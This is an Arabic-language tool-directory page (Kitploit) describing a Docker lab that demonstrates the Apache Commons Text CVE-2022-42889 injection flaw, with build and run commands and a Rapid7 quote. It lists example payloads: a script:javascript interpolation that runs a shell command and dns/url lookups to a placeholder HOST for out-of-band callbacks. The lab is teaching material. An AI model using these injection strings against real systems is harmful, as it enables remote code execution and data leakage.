Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-42889 — docker لـ CVE-2022-42889 | Kitploit
أدوات/GitHubGitHub/necroteddy/cve-2022-42889
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubnecroteddy/cve-2022-42889

CVE-2022-42889

docker لـ CVE-2022-42889

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-42889-POC

تطبيق تجريبي بسيط يوضح كيفية استغلال ثغرة CVE-2022-42889.
يستخدم خدمات OOB (خارج النطاق) لتوضيح بادئات dns و url.

JavaDocs لـ commons-text interpolation commons-text JavaDocs

أمثلة على الاستيفاءات

  • script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
  • dns ("${dns:address|HOST}")
  • url ("${url:UTF-8:http://HOST")

اقتباس من Rapid7

تمت مقارنة هذه الثغرة بـ Log4Shell نظرًا لأنها ثغرة على مستوى مكتبة مفتوحة المصدر ومن المرجح أن تؤثر على مجموعة واسعة من تطبيقات البرمجيات التي تستخدم الكائن المعني.
ومع ذلك، يشير التحليل الأولي إلى أن هذه المقارنة غير دقيقة. طبيعة الثغرة تعني أنه على عكس Log4Shell، سيكون من النادر أن يستخدم تطبيق ما المكوّن القابل للاستغلال من Commons Text لمعالجة مدخلات غير موثوقة وربما خبيثة.

المتطلبات الأساسية

  • docker
  • java
  • maven

يمكن تخطي Java و maven إذا قام أحد بسحب الصورة من Docker Hub

الاستخدام

بناء التطبيق

root@kitploit:~
mvn clean package

بناء صورة docker

root@kitploit:~
docker build -t cve-2022-42889-poc .

تشغيل صورة docker

root@kitploit:~
docker run --rm -p 8081:8081 -t cve-2022-42889-poc
تنزيل الأداة

الوصول إلى التطبيق واتباع التعليمات

root@kitploit:~
open http://localhost:8081

مزيد من المعلومات

  • NIST NVD
  • Rapid 7